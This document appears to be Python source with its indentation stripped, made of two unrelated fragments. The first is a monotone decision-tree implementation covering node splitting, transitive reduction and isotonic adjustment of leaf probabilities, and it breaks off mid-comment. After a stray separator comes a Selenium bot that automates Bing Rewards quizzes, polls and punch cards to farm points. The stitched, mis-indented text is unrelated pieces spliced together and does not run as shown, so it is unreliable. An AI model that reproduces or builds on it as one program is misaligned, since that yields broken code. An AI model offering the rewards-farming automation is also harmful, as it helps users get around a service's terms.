self.num_nodes_arr_=np.zeros(1,dtype=np.int32)
self.l_curr_size_=np.zeros(1,dtype=np.int32)
self.done_normalising=False
return
def trim_to_size(self):
self.free_node_ids=None
self.free_node_ids_num=0
self.train_X=None
self.train_y=None
self.node_train_idx=self.node_train_idx[0:self.num_nodes,:]
self.node_train_num=self.node_train_num[0:self.num_nodes]
self.features=self.features[0:self.num_nodes]
self.thresholds=self.thresholds[0:self.num_nodes]
self.children_left=self.children_left[0:self.num_nodes]#np.zeros([self.assumed_max_nodes],dtype=np.int32)
self.children_right=self.children_right[0:self.num_nodes]#np.zeros([self.assumed_max_nodes],dtype=np.int32)
self.values=self.values[0:self.num_nodes,:]#np.zeros([self.assumed_max_nodes,num_classes],dtype=np.float64)
self.cdf_data=self.cdf_data[0:self.num_nodes,:]#np.ones([self.assumed_max_nodes,num_classes],dtype=np.float64)
self.cdf=self.cdf[0:self.num_nodes,:]#np.ones([self.assumed_max_nodes,num_classes],dtype=np.float64)
self.sample_weight=self.sample_weight[0:self.num_nodes]#np.zeros([self.assumed_max_nodes],dtype=np.float64)
self.pred_class=self.pred_class[0:self.num_nodes]
return
def set_mt_feats(self,incr_feats,decr_feats):
if incr_feats is not None or decr_feats is not None :
self.in_feats=np.asarray(incr_feats)-1
self.de_feats=np.asarray(decr_feats)-1
mt_feats=list(self.in_feats).copy()
for i in np.arange(len(self.de_feats)): mt_feats.append(self.de_feats[i])
self.mt_feats=mt_feats
self.nmt_feats=np.asarray([f for f in np.arange(self.num_feats) if f not in mt_feats])
self.mt_feat_types=np.zeros(self.num_feats,dtype=np.int32)
if len(self.in_feats)>0:
self.mt_feat_types[self.in_feats]=+1
if len(self.de_feats)>0:
self.mt_feat_types[self.de_feats]=-1
def get_increasing_leaf_node_pairs(self):
#probs,lowers,uppers=self.get_corner_matrices()
max_pairs=int(np.round(self.lower_corners.shape[0]*self.lower_corners.shape[0]))
incr_pairs=np.zeros([max_pairs,2],dtype=np.int32)
n_pairs_new=isoensemble.get_increasing_leaf_node_pairs_array(self.lower_corners,self.upper_corners,self.leaf_ids_obj.get_idx_array(),self.mt_feat_types,incr_pairs)
#incr_pairs_old=self.get_increasing_leaf_node_pairs_simple()
return incr_pairs[0:n_pairs_new,:]
def eliminate_unnecessary_incr_pairs(self,pm_pairs):
# G=nx.DiGraph()
# #G.add_nodes_from(np.arange(np.max(self.leaf_ids_obj.get_idx_array())+1,dtype='int'))
# G.add_edges_from(pm_pairs)
# remove_redundant_edges(G)
# res=G.edges().copy()
# return res
# faster cython immplementation
# first reduce number of leaves
# uniq_leaves=np.unique(pm_pairs)
# lkp=dict()
# rev_lkp=dict()
# for i in np.arange(len(uniq_leaves)):
# lkp[uniq_leaves[i]]=i
# rev_lkp[i]=uniq_leaves[i]
# pm_pairs_sequenced=np.zeros(pm_pairs.shape,dtype=np.int32)
# for i in np.arange(pm_pairs.shape[0]):
# pm_pairs_sequenced[i,0]= lkp[pm_pairs[i,0]]
# pm_pairs_sequenced[i,1]= lkp[pm_pairs[i,1]]
if len(pm_pairs)==0:
return pm_pairs
else:
out_pm_pairs=np.zeros(pm_pairs.shape,dtype=np.int32)
num_pairs=isoensemble.calculate_transitive_reduction_c(pm_pairs,out_pm_pairs)
out_pm_pairs=out_pm_pairs[0:num_pairs,:]
out_pm_pairs_w=np.zeros(pm_pairs.shape,dtype=np.int32)
num_pairs=isoensemble.calculate_transitive_reduction_c_warshal(pm_pairs,out_pm_pairs_w)
out_pm_pairs_w=out_pm_pairs_w[0:num_pairs,:]
return out_pm_pairs
# for i in np.arange(out_pm_pairs.shape[0]):
# out_pm_pairs[i,0]= rev_lkp[out_pm_pairs[i,0]]
# out_pm_pairs[i,1]= rev_lkp[out_pm_pairs[i,1]]
def get_non_monotone_pairs(self,pm_pairs):
nmt_pairs=[]
for pair in pm_pairs:
#if self.leaf_nodes[pair[0]].predicted_class>self.leaf_nodes[pair[1]].predicted_class:
if self.pred_class[pair[0]]>self.pred_class[pair[1]]:
nmt_pairs.append(pair)
return nmt_pairs
def clean_monotone_island_pairs(self,pm_pairs_clean,nmt_pairs):
graph=nx.DiGraph()
graph.add_edges_from(pm_pairs_clean)
ud_graph=graph.to_undirected()
nodes_with_constraints =set(graph.nodes())
unchecked_nodes=nodes_with_constraints.copy()
polluted_nodes=set(np.unique(np.ravel(np.asarray(nmt_pairs))))
safe_island_nodes_to_remove=[]#set()
for n in graph.nodes():
if graph.predecessors(n) == []: # root node #successors(n)
if n in unchecked_nodes:
nodes=set(nx.descendants(ud_graph,n))
has_no_nmt_polluted_nodes = len(nodes.intersection(polluted_nodes))==0
if has_no_nmt_polluted_nodes:
safe_island_nodes_to_remove=safe_island_nodes_to_remove+ list(nodes) + [n]
unchecked_nodes.difference_update(nodes)
unchecked_nodes.difference_update([n])
cleaned_edges=nx.DiGraph()
for edge in pm_pairs_clean:
if edge[0] not in safe_island_nodes_to_remove :
cleaned_edges.add_edge(edge[0],edge[1])
return cleaned_edges.edges()
def get_next_free_node_ids(self,number=1):
results=np.zeros(number,dtype=np.int32)
#num_to_add=0
for i in np.arange(number):
idx=self.free_node_ids_num-1
if idx>=0:
results[i]=self.free_node_ids[idx]
self.free_node_ids_num=self.free_node_ids_num-1
else:
results[i]=self.num_nodes#num_to_add
#num_to_add=num_to_add+1
self.num_nodes=self.num_nodes+1
return results
def return_free_node_id(self,node_id):
#results=np.zeros(number,dtype=np.int32)
#num_to_add=0
self.free_node_ids[self.free_node_ids_num]=node_id
self.free_node_ids_num=self.free_node_ids_num+1
return
# i=0
# while self.children_left[i]!=0:
# i=i+1
#
# first=i
# i=i+1
# while self.children_left[i]!=0:
# i=i+1
# return [first,i]
def grow_segregated_nodes(self,node_to_grow,node_to_intersect_with):
if self.split_weight not in ['hybrid_prob' ,'prob_empirical_cond','hybrid_prob_empirical_orig_train' ]: #,'hybrid_prob_empirical'
self.free_node_ids_num_arr_[0]=self.free_node_ids_num
self.num_nodes_arr_[0]=self.num_nodes
self.l_curr_size_[0]=self.leaf_ids_obj.curr_size
change_made=isoensemble.grow_segregated_nodes_c(node_to_grow,
node_to_intersect_with,
self.free_node_ids,
self.free_node_ids_num_arr_,
self.num_nodes_arr_,
sc_dict[self.split_criterion],
self.sample_weight,
self.min_split_weight,
sw_dict[self.split_weight],
self.lower_corners,
self.upper_corners,
self.node_train_num,
self.node_train_idx,
self.assumed_max_nodes,
self.train_X,
self.train_y,
self.num_classes,
self.train_sample_weight,
self.features,
self.thresholds,
self.children_left,
self.children_right,
self.values,
self.cdf_data,
self.cdf,
self.pred_class,
self.leaf_ids_obj.leaf_index,
self.leaf_ids_obj.leaf_array,
self.l_curr_size_,
self.univar_vals,
self.univar_probs,
self.univar_vals_num
)==1
# restore values passed by proxy array
self.free_node_ids_num=self.free_node_ids_num_arr_[0]
self.num_nodes=self.num_nodes_arr_[0]
self.leaf_ids_obj.curr_size=self.l_curr_size_[0]
# refresh leaf ids object
#self.leaf_ids_obj=LeafIDs(self.children_left==TREE_LEAF)
else: # old way
#for node_to_grow,l2 in [[leafnode1,leafnode2],[leafnode2,leafnode1]]:
l1=node_to_grow
l2=node_to_intersect_with
change_made=False
[temp_split_left_node_id,temp_split_right_node_id]=self.get_next_free_node_ids(2)
split_decision=False
if self.split_criterion=='both_sides_have_min_sample_wgt' and self.sample_weight[l1]<2*self.min_split_weight: # there is no way to split this node, stop
pass
else:
#feats=list(self.nmt_feats) + list( self.mt_feats) # should result in less splits (and nodes) if we split on NMT feats first
for i_feat in np.arange(self.num_feats): #feats: # np.arange(len(l1.corner_lower)): #self.mt_feats:# np.arange(len(l1.corner_lower)):
for dirn in ['left','right']:
split_val=-99e9
if self.split_weight!='univar_prob_distn' or (self.split_weight=='univar_prob_distn' and l1.size>0.000005): # don't split when it gets too small!!
if dirn=='right':
#if l1.corner_lower[i_feat]<l2.corner_lower[i_feat] and l1.corner_upper[i_feat]>l2.corner_lower[i_feat] : # slice off bottom bit
if self.lower_corners[l1,i_feat]<self.lower_corners[l2,i_feat] and self.upper_corners[l1,i_feat]>self.lower_corners[l2,i_feat] : # slice off bottom bit
split_val=self.lower_corners[l2,i_feat]
else: # left
#if l1.corner_upper[i_feat]>l2.corner_upper[i_feat] and l1.corner_lower[i_feat]<l2.corner_upper[i_feat] :
if self.upper_corners[l1,i_feat]>self.upper_corners[l2,i_feat] and self.lower_corners[l1,i_feat]<self.upper_corners[l2,i_feat] :
split_val=self.upper_corners[l2,i_feat]
if split_val!=-99e9: # need to split on this feat value
# work out which points go where for this proposed split
#temp_split_left_node_id=self.num_nodes
#temp_split_right_node_id=self.num_nodes+1
self.node_train_num[temp_split_left_node_id]=0
self.node_train_num[temp_split_right_node_id]=0
self.sample_weight[temp_split_left_node_id]=0.
self.sample_weight[temp_split_right_node_id]=0.
for i_ in np.arange(self.node_train_num[l1]):
i=self.node_train_idx[l1,i_]
if self.train_X[i,i_feat]<=split_val:
self.node_train_idx[temp_split_left_node_id,self.node_train_num[temp_split_left_node_id]]=i
self.node_train_num[temp_split_left_node_id]=self.node_train_num[temp_split_left_node_id]+1
self.sample_weight[temp_split_left_node_id]=self.sample_weight[temp_split_left_node_id]+self.train_sample_weight[i]
else:
self.node_train_idx[temp_split_right_node_id,self.node_train_num[temp_split_right_node_id]]=i
self.node_train_num[temp_split_right_node_id]=self.node_train_num[temp_split_right_node_id]+1
self.sample_weight[temp_split_right_node_id]=self.sample_weight[temp_split_right_node_id]+self.train_sample_weight[i]
# adjust child sample weights if required
if self.split_weight=='parent_weight':
self.sample_weight[temp_split_left_node_id]=self.sample_weight[l1]
self.sample_weight[temp_split_right_node_id]=self.sample_weight[l1]
elif self.split_weight=='contained_pts_weight':
pass # sample weights already correctly set
#self.sample_weight[temp_split_left_node_id]=self.sample_weight[temp_split_left_node_id]#np.max([0.5,self.sample_weight[temp_split_left_node_id]])
#self.sample_weight[temp_split_right_node_id]=self.sample_weight[temp_split_right_node_id]#np.max([0.5,self.sample_weight[temp_split_right_node_id]])
elif self.split_weight=='hybrid_prob' or self.split_weight=='hybrid_prob_empirical' or self.split_weight=='prob_empirical_cond' or self.split_weight=='hybrid_prob_empirical_orig_train' :
if self.sample_weight[temp_split_left_node_id]==0. or self.sample_weight[temp_split_right_node_id]==0.:
if self.split_weight=='prob_empirical_cond':
#[dist_vals,dist_probs]=self.univariate_distns[l1.predicted_class][i_feat]
raise NotImplemented
else:
[dist_vals,dist_probs]=self.univariate_distns[i_feat]
left_extents=[self.lower_corners[l1,i_feat],split_val]
right_extents=[split_val,self.upper_corners[l1,i_feat]]
#left_extents=[l1.corner_lower[i_feat],split_val]
#right_extents=[split_val,l1.corner_upper[i_feat]]
prob_left=calc_probability(dist_vals,dist_probs,left_extents[0],left_extents[1])
prob_right=calc_probability(dist_vals,dist_probs,right_extents[0],right_extents[1])
self.sample_weight[temp_split_left_node_id]=self.sample_weight[l1]*prob_left/(prob_left+prob_right)
self.sample_weight[temp_split_right_node_id]=self.sample_weight[l1]*prob_right/(prob_left+prob_right)
elif self.split_weight=='univar_prob_distn':
raise NotImplemented
# make decision to split or not
if self.split_criterion=='both_sides_have_pts':
split_decision=self.sample_weight[temp_split_left_node_id]>0 and self.sample_weight[temp_split_right_node_id]>0
elif self.split_criterion=='incomp_side_has_pts' : #len(indx_left)>0 and len(indx_right)>0 : #CHANGE FROM SOLVED VERSION 10/4/17: (len(indx_left)>0 and dirn=='right') or (len(indx_right)>0 and dirn=='left') :
if dirn=='right':
split_decision=self.sample_weight[temp_split_left_node_id]>0
else: # left
split_decision=self.sample_weight[temp_split_right_node_id]>0
elif self.split_criterion=='both_sides_have_min_sample_wgt' : #len(indx_left)>0 and len(indx_right)>0 : #CHANGE FROM SOLVED VERSION 10/4/17: (len(indx_left)>0 and dirn=='right') or (len(indx_right)>0 and dirn=='left') :
split_decision=self.sample_weight[temp_split_left_node_id]>=self.min_split_weight and self.sample_weight[temp_split_right_node_id]>=self.min_split_weight
else: #if self.split_criterion=='all_splits_ok' :
split_decision=True
# split if so decided
if split_decision:
change_made=True
self.features[l1]=i_feat
self.thresholds[l1]=split_val
self.children_left[l1]=temp_split_left_node_id
self.children_right[l1]=temp_split_right_node_id
self.children_left[temp_split_left_node_id]=TREE_LEAF
self.children_right[temp_split_left_node_id]=TREE_LEAF
self.children_left[temp_split_right_node_id]=TREE_LEAF
self.children_right[temp_split_right_node_id]=TREE_LEAF
#self.num_nodes=np.max([temp_split_left_node_id+1,temp_split_right_node_id+1,self.num_nodes])
#self.free_node_ids[self.free_node_ids_num-1]=-99
#self.free_node_ids[self.free_node_ids_num-2]=-99
#self.free_node_ids_num=np.max([0,self.free_node_ids_num-2
for i_ in np.arange(self.node_train_num[temp_split_left_node_id]):
i=self.node_train_idx[temp_split_left_node_id,i_]
self.values[temp_split_left_node_id,self.train_y[i]]=self.values[temp_split_left_node_id,self.train_y[i]]+self.train_sample_weight[i]
for i_ in np.arange(self.node_train_num[temp_split_right_node_id]):
i=self.node_train_idx[temp_split_right_node_id,i_]
self.values[temp_split_right_node_id,self.train_y[i]]=self.values[temp_split_right_node_id,self.train_y[i]]+self.train_sample_weight[i]
#self.values=np.zeros([self.assumed_max_nodes,num_classes],dtype=np.float64)
cum_sum=0.
for i_class in np.arange(self.num_classes):
cum_sum=cum_sum+self.values[temp_split_left_node_id,i_class]
self.cdf_data[temp_split_left_node_id,i_class]=cum_sum
if cum_sum>0:
self.cdf_data[temp_split_left_node_id,:]=self.cdf_data[temp_split_left_node_id,:]/cum_sum
cum_sum=0.
for i_class in np.arange(self.num_classes):
cum_sum=cum_sum+self.values[temp_split_right_node_id,i_class]
self.cdf_data[temp_split_right_node_id,i_class]=cum_sum
if cum_sum>0:
self.cdf_data[temp_split_right_node_id,:]=self.cdf_data[temp_split_right_node_id,:]/cum_sum
self.cdf[temp_split_left_node_id,:]=self.cdf[l1,:]#.copy()
self.cdf[temp_split_right_node_id,:]=self.cdf[l1,:]#.copy()
#self.sample_weight=np.zeros([self.assumed_max_nodes],dtype=np.float64)
self.pred_class[temp_split_left_node_id]=self.pred_class[l1]#np.argmax(self.cdf[temp_split_left_node_id,:]>=0.5, axis=0)
self.pred_class[temp_split_right_node_id]=self.pred_class[l1]#np.argmax(self.cdf[temp_split_right_node_id,:]>=0.5, axis=0)
self.lower_corners[temp_split_left_node_id,:]=self.lower_corners[l1,:]
self.lower_corners[temp_split_right_node_id,:]=self.lower_corners[l1,:]
self.upper_corners[temp_split_left_node_id,:]=self.upper_corners[l1,:]
self.upper_corners[temp_split_right_node_id,:]=self.upper_corners[l1,:]
self.upper_corners[temp_split_left_node_id,i_feat]=split_val
self.lower_corners[temp_split_right_node_id,i_feat]=split_val
self.leaf_ids_obj.replace_leaf_with_chn(l1,temp_split_left_node_id,temp_split_right_node_id)
#leaf_ids_=list(self.leaf_ids)
#leaf_ids_.remove(l1)
#leaf_ids_=leaf_ids_+[temp_split_left_node_id,temp_split_right_node_id]
#self.leaf_ids=np.asarray(leaf_ids_)
#l1.left.resubst_err_node=l1.resubst_err_node #np.sum(self.sample_weight[indx_left])/self.sample_weight_total*(1-np.max(node.left.probabilities))
#l1.right.resubst_err_node=l1.resubst_err_node #np.sum(self.sample_weight[indx_right])/self.sample_weight_total*(1-np.max(node.right.probabilities))
# move to child to follow
[temp_split_left_node_id,temp_split_right_node_id]=self.get_next_free_node_ids(2)
#print(self.num_nodes)
l1=self.children_left[l1] if dirn=='left' else self.children_right[l1]
self.return_free_node_id(temp_split_left_node_id)
self.return_free_node_id(temp_split_right_node_id)
# update peak leaves if required
num_leaves=self.leaf_ids_obj.curr_size#len(self.leaf_ids)
if num_leaves>self.peak_leaves:
self.peak_leaves=num_leaves
return change_made
def get_pairs_to_split(self,pm_pairs_clean,nmt_pairs,normalise_nmt_nodes):
if self.normalise_nmt_nodes==0:
pairs_to_split=[] #if normalise_nmt_nodes==1 else pm_pairs_clean
elif self.normalise_nmt_nodes==1:
pairs_to_split=nmt_pairs
elif self.normalise_nmt_nodes==2:
pairs_to_split=pm_pairs_clean
elif self.normalise_nmt_nodes==3:
raise NotImplemented()
return pairs_to_split
def get_leaf_id_pairs(self,cleaned_pairs):
# lookup=np.zeros(np.max(self.leaf_ids_obj.get_idx_array())+1,dtype=np.int32)
#
# l_=0
# for l in self.leaf_ids_obj.get_idx_array():
# lookup[l]=l_
# l_=l_+1
# leaf_id_pairs=[]
# for pair in cleaned_pairs:
# leaf_id_pairs=leaf_id_pairs+[(lookup[pair[0]],lookup[pair[1]])]
#return leaf_id_pairs
pairs=np.asarray(cleaned_pairs,dtype=np.int32)
if pairs.shape[0]>0:
out_seq_pairs=np.zeros(pairs.shape,dtype=np.int32)
leaf_ids=self.leaf_ids_obj.get_idx_array()
isoensemble.get_leaf_id_pairs_c(pairs,leaf_ids,out_seq_pairs)
return out_seq_pairs
# def recalculate_leaf_ids(self):
# leaf_ids=np.zeros(2000,dtype=np.int32)
# num_leaves=0
# for node_id in np.arange(self.num_nodes):
# if self.children_left[node_id]==TREE_LEAF:
# leaf_ids[num_leaves]=node_id
# num_leaves=num_leaves+1
# self.leaf_ids=leaf_ids[0:num_leaves]
# max_leaf_id=self.num_nodes
# while self.children_left[max_leaf_id]==0:
# max_leaf_id=max_leaf_id-1
# #self.num_nodes=max_leaf_id
# if num_leaves>self.peak_leaves:
# self.peak_leaves=num_leaves
# #print(self.num_nodes)
# find any pairse of child nodes with a common parent and the same predicted class. If found, fuse the parent.
# returns 0 if no nodes were fused, or else the number of nodes fused.
def simplify_old(self,node_id=None):
if node_id is None: node_id=0
res=self.simplify_recurse(node_id)
self.recalculate_leaf_ids()
return res
def simplify_recurse(self,node_id=None):
if node_id is None: node_id=0
if self.children_left[node_id]==TREE_LEAF:
return 0
else:
left_id=self.children_left[node_id]
right_id=self.children_right[node_id]
if self.children_left[left_id]==TREE_LEAF and self.children_left[right_id]==TREE_LEAF: # this is an immediate parent node
if self.pred_class[left_id]==self.pred_class[right_id]:
#if node.left.predicted_class==node.right.predicted_class:
# if self.pred_class[node_id]!=elf.pred_class[left_id]: # these were obviously changed. set probabilities of node to average of children
# node._probabilities=list((np.asarray(node.left.probabilities)*node.left.size+np.asarray(node.right.probabilities)*node.right.size)/(node.left.size+node.right.size))
# if np.isnan(node._probabilities[0]):
# print('what the')
# node.fuse()
# self.number_nodes()
self.children_left[node_id]=TREE_LEAF
self.children_right[node_id]=TREE_LEAF
self.children_left[left_id]=0#TREE_LEAF
self.children_left[right_id]=0#TREE_LEAF
self.children_right[left_id]=0
self.children_right[right_id]=0
self.free_node_ids[self.free_node_ids_num]=left_id
self.free_node_ids_num=self.free_node_ids_num+1
self.free_node_ids[self.free_node_ids_num]=right_id
self.free_node_ids_num=self.free_node_ids_num+1
# leaf_ids_=list(self.leaf_ids)
# leaf_ids_.remove(left_id)
# leaf_ids_.remove(right_id)
# leaf_ids_=leaf_ids_+[node_id]
# self.leaf_ids=np.asarray(leaf_ids_)
return 1
else:
return 0
else: # node has children with different
res_left=self.simplify_recurse(self.children_left[node_id])
res_right=self.simplify_recurse(self.children_right[node_id])
return res_left+res_right
# find any pairse of child nodes with a common parent and the same predicted class. If found, fuse the parent.
# returns 0 if no nodes were fused, or else the number of nodes fused.
def simplify(self):
num_fuses=0
for node_id in np.arange(self.num_nodes):
if self.children_left[node_id]!= TREE_LEAF and self.children_left[node_id]!= 0:
left_id=self.children_left[node_id]
right_id=self.children_right[node_id]
if self.children_left[left_id]==TREE_LEAF and self.children_left[right_id]==TREE_LEAF: # this is an immediate parent node
if self.pred_class[left_id]==self.pred_class[right_id]:
self.children_left[node_id]=TREE_LEAF
self.children_right[node_id]=TREE_LEAF
self.children_left[left_id]=0#TREE_LEAF
self.children_left[right_id]=0#TREE_LEAF
self.children_right[left_id]=0
self.children_right[right_id]=0
self.leaf_ids_obj.fuse_branch(left_id,right_id,node_id)
self.free_node_ids[self.free_node_ids_num]=left_id
self.free_node_ids_num=self.free_node_ids_num+1
self.free_node_ids[self.free_node_ids_num]=right_id
self.free_node_ids_num=self.free_node_ids_num+1
num_fuses=num_fuses+1
#self.recalculate_leaf_ids()
return num_fuses
def monotonise(self,sample_reweights=None,univar_vals=None,univar_probs=None,univar_vals_num=None):
self.univar_vals=univar_vals
self.univar_probs=univar_probs
self.univar_vals_num=univar_vals_num
#self.univariate_distns=univariate_distns
# get increasing pairs
pm_pairs=self.get_increasing_leaf_node_pairs()
pm_pairs_clean=self.eliminate_unnecessary_incr_pairs(pm_pairs)
nmt_pairs=self.get_non_monotone_pairs(pm_pairs_clean)
# decide on pair to split
pairs_to_split=self.get_pairs_to_split(pm_pairs_clean,nmt_pairs,self.normalise_nmt_nodes)
#pairs_to_split=self.get_non_monotone_pairs_extended(nmt_pairs,pm_pairs_clean)
# stop if already monotone
if nmt_pairs==[]: # already monotone
return 0
# grow segregated nodes if requested
if self.normalise_nmt_nodes>0 and not self.done_normalising:
self.done_normalising=True
keep_going=True
while keep_going:
keep_going=False
change_made=False
changed_nodes=[]
#pairs_to_split=nmt_pairs if normalise_nmt_nodes==1 else pm_pairs_clean
for pair in pairs_to_split:
if pair[0] not in changed_nodes and pair[1] not in changed_nodes : # this filter seems a tad slower and hence complexity is not warranted
change_made1=self.grow_segregated_nodes(pair[0],pair[1])
change_made2=self.grow_segregated_nodes(pair[1],pair[0])
if change_made1: changed_nodes.append(pair[0])
if change_made2: changed_nodes.append(pair[1])
change_made=change_made or change_made1 or change_made2
if change_made:
#self.number_nodes()
#print(' now: ' + str(len(self.leaf_nodes)))
pm_pairs=self.get_increasing_leaf_node_pairs()
pm_pairs_clean=self.eliminate_unnecessary_incr_pairs(pm_pairs)
nmt_pairs=self.get_non_monotone_pairs(pm_pairs_clean)
pairs_to_split=self.get_pairs_to_split(pm_pairs_clean,nmt_pairs,self.normalise_nmt_nodes) #nmt_pairs if normalise_nmt_nodes==1 else pm_pairs_clean
keep_going=True
# monotonise the cdf
cleaned_pairs=self.clean_monotone_island_pairs(pm_pairs_clean,nmt_pairs)
if sample_reweights is not None:
raise NotImplemented
# weights=self.get_leaf_sizes()
# else:
# weights=self.recalc_leaf_sizes(sample_reweights)
leaf_id_pairs=self.get_leaf_id_pairs(cleaned_pairs)
leaf_ids_=self.leaf_ids_obj.get_idx_array()
cdf=self.cdf[leaf_ids_,:] #get_cum_probabilities()
weights=self.sample_weight[leaf_ids_]
cdf_iso=np.ones(cdf.shape)
pdf_iso=np.zeros(cdf.shape)
cum_sse=0.
for i_class in np.arange(cdf.shape[1]):
probs_class=cdf[:,i_class]
gir=isoensemble.GeneralisedIsotonicRegression()
if i_class<cdf.shape[1]-1:
#cdf_iso[:,i_class]=gir.fit(probs_class,pm_pairs_clean,sample_weight=weights,increasing=False)
#print(probs_class)
cdf_iso[:,i_class]=np.round(gir.fit(probs_class,leaf_id_pairs,sample_weight=weights,increasing=False),6)
if i_class==0:
pdf_iso[:,i_class]=cdf_iso[:,i_class]
else:
pdf_iso[:,i_class]=cdf_iso[:,i_class]-cdf_iso[:,i_class-1]
cum_sse=np.sum((cdf_iso-cdf)**2)
# update the leave probabilities
if cum_sse>1e-7: # some changes were made
self.cdf[leaf_ids_,:]=cdf_iso
self.pred_class[leaf_ids_]=np.argmax(self.cdf[leaf_ids_,:]>=0.5, axis=1)
# for leaf in self.leaf_nodes:
# leaf._probabilities=list(pdf_iso[leaf.index_leaf,:])
# if np.isnan(leaf._probabilities[0]):
# print('what | |
alerts
'''
try:
driver.switch_to.alert.dismiss()
except (NoAlertPresentException, UnexpectedAlertPresentException):
pass
def __is_offer_sign_in_bug(self, driver):
'''
Sometimes when clicking an offer for the first time, it will show a page saying the user is not signed in. Pretty sure it's a Bing bug. This method checks for this bug
'''
try:
driver.find_element(By.CLASS_NAME, 'identityStatus')
return True
except NoSuchElementException:
return False
def __has_overlay(self, driver):
'''most offers that have the word 'quiz' in title have a btOverlay ID. However, certain quizzes that related to special events i.e. halloween do not have this overlay'''
self.__sys_out("Starting quiz", 3)
try_count = 0
while True:
try:
driver.find_element(By.ID, "btOverlay")
return True
except NoSuchElementException:
try_count += 1
if try_count >= 1:
self.__sys_out("Could not detect quiz overlay", 3, True)
return False
time.sleep(2)
def __click_offer(self, driver, offer, title_xpath, checked_xpath):
title = offer.find_element(By.XPATH, title_xpath).text
self.__sys_out("Trying {0}".format(title), 2)
# check whether it was already completed
checked = False
try:
icon = offer.find_element(By.XPATH, checked_xpath)
if icon.get_attribute('class').startswith(
"mee-icon mee-icon-SkypeCircleCheck"
):
checked = True
self.__sys_out("Already checked", 2, True)
#quiz does not contain a check-mark icon, implying no points offered
except NoSuchElementException:
checked = True
self.__sys_out("skipping quiz - assuming it offers no points", 3)
completed = True
if not checked:
offer.click()
driver.switch_to.window(driver.window_handles[-1])
#Check for cookies popup - UK thing
if self.cookieclearquiz == 0:
self.__sys_out("Checking cookies popup", 3)
try:
WebDriverWait(driver, self.__WEB_DRIVER_WAIT_SHORT).until(
EC.element_to_be_clickable((By.ID, "bnp_btn_accept"))
).click()
self.__sys_out("cookie popup cleared", 3)
self.cookieclearquiz = 1
except TimeoutException:
self.__sys_out("No cookie popup present", 3)
self.cookieclearquiz = 1
if self.__is_offer_sign_in_bug(driver):
completed = -1
elif "poll" in title.lower():
completed = self.__poll(driver, title.lower())
#if "quiz" in title.lower()
else:
if self.__has_overlay(driver):
completed = self.__quiz(driver)
else:
completed = self.__quiz2(driver)
if completed == -1:
self.__sys_out(
"Sign in Bing bug for offer {0}, will try again".
format(title), 2, True
)
elif completed:
self.__sys_out(
"Successfully completed {0}".format(title), 2, True
)
else:
self.__sys_out("Failed to complete {0}".format(title), 2, True)
driver.switch_to.window(driver.window_handles[0])
self.__open_dashboard(driver) # for stale element exception
return completed
def map_offers(self, driver):
'''
Creates a dictionary where (k, v)= (offer title, offer element)
Useful for testing individual offers
'''
self.__open_dashboard(driver)
title_to_offer = {}
for i in range(3):
offer = driver.find_element(By.XPATH,
'//*[@id="daily-sets"]/mee-card-group[1]/div/mee-card[{}]/div/card-content/mee-rewards-daily-set-item-content/div/a'
.format(i + 1)
)
title = offer.find_element(By.XPATH, './div[2]/h3').text
title_to_offer[title + str(i)] = offer
for i in range(30):
try:
offer = driver.find_element(By.XPATH,
'//*[@id="more-activities"]/div/mee-card[{}]/div/card-content/mee-rewards-more-activities-card-item/div/a'
.format(i + 1)
)
title = offer.find_element(By.XPATH, './div[2]/h3').text
title_to_offer[title + str(i)] = offer
i += 1
except NoSuchElementException:
pass
return title_to_offer
def __iterate_offers(self, driver, offer_xpath, completed, offer_count):
#try statement in case we try to find an offer that exceeded the range index
try:
for i in range(offer_count):
c = -1
try_count = 0
while c == -1 and try_count <= 2:
offer = driver.find_element(By.XPATH,
offer_xpath.format(offer_index=i + 1)
)
c = self.__click_offer(
driver, offer, './div[2]/h3',
'./mee-rewards-points/div/div/span[1]'
)
try_count += 1
#first quiz never started (MS bug) but pts still awarded
if i == 0 and offer_count == 3:
completed.append(True)
else:
completed.append(c)
except NoSuchElementException:
completed.append(-1)
return completed
def __offers(self, driver):
# showcase offer
self.__open_dashboard(driver)
completed = []
#daily set
offer_xpath = '//*[@id="daily-sets"]/mee-card-group[1]/div/mee-card[{offer_index}]/div/card-content/mee-rewards-daily-set-item-content/div/a'
self.__iterate_offers(driver, offer_xpath, completed, offer_count=3)
# remaining offers
remaining_offer_count = len(driver.find_elements(By.XPATH,
'//*[@id="more-activities"]/div/mee-card'
))
offer_xpath = '//*[@id="more-activities"]/div/mee-card[{offer_index}]/div/card-content/mee-rewards-more-activities-card-item/div/a'
self.__iterate_offers(driver, offer_xpath, completed, offer_count=remaining_offer_count)
return min(completed)
def __punchcard_activity(self, driver, parent_url, childPromotions):
"""
Each punch card has multiple activities.
Completes the latest punch card activity.
"""
for activity_index, activity in enumerate(childPromotions):
if activity['complete'] is False:
activity_title = activity['title']
self.__sys_out(f'Starting activity "{activity_title}"', 2)
if activity['promotionType'] == "quiz":
activity_url = activity['attributes']['destination']
#can't use redirect link b/c it disappears if you want to start a quiz that was already in progress
driver.get(activity_url)
time.sleep(2)
if self.__is_offer_sign_in_bug(driver):
driver.get(activity_url)
if self.__has_overlay(driver):
self.__quiz(driver)
else:
self.__quiz2(driver)
elif activity['promotionType'] == "urlreward":
driver.get(parent_url)
time.sleep(2)
#will only get points if you click the redirect link, can't go to the page directly
driver.execute_script("document.getElementsByClassName('offer-cta')[0].click()")
time.sleep(2)
driver.close()
driver.switch_to.window(driver.window_handles[0])
#no point doing remaining activities due to 24 hour wait restriction
break
# return the activity number so we can get it's progress later
return activity_index
def __punchcard(self, driver):
is_complete_activity = True
punchcards = self.get_dashboard_data(driver)['punchCards']
# find valid punchcard
for punchcard_index, punchcard in enumerate(punchcards):
# Check if valid punchcard
if punchcard['parentPromotion'] \
and 'appstore' not in punchcard['parentPromotion']['attributes']['type'] \
and punchcard['parentPromotion']['pointProgressMax'] != 0 \
and punchcard['childPromotions']:
parent_url = punchcard['parentPromotion']['attributes']['destination']
title = punchcard['parentPromotion']['attributes']['title']
# check if valid punchcard is completed
is_complete_punchcard = punchcard['parentPromotion']['complete']
if not is_complete_punchcard:
self.__sys_out(f'Punch card "{title}" is not complete yet.', 2)
#complete latest punch card activity
activity_index = self.__punchcard_activity(driver, parent_url, punchcard['childPromotions'])
is_complete_activity = self.get_dashboard_data(driver)['punchCards'][punchcard_index]['childPromotions'][activity_index]['complete']
if is_complete_activity:
self.__sys_out('Latest punch card activity successfully completed!', 3)
else:
self.__sys_out('Latest punch card activity NOT successfully completed. Possibly not enough time has elapsed since last punch.', 3)
else:
self.__sys_out(f'Punch card "{title}" is already completed.', 2)
driver.get(parent_url)
